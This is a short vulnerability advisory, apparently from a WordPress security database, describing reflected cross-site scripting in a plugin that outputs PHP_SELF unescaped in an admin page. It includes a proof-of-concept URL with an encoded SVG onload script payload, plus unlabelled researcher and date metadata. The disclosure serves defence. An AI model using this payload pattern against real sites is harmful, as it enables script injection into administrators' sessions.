The plugin does not sanitise and escape the PHP_SELF PHP variable before outputting it back in an attribute in an admin page, leading to Reflected Cross-Site Scripting.
https://example.com/wp-admin/options-general.php/%22%3E%3Csvg/onload=alert(/xss/)%3E?page=ais
p7e4
p7e4
Yes
2022-04-19 (about 1 years ago)
2022-04-19 (about 1 years ago)
2022-04-20 (about 1 years ago)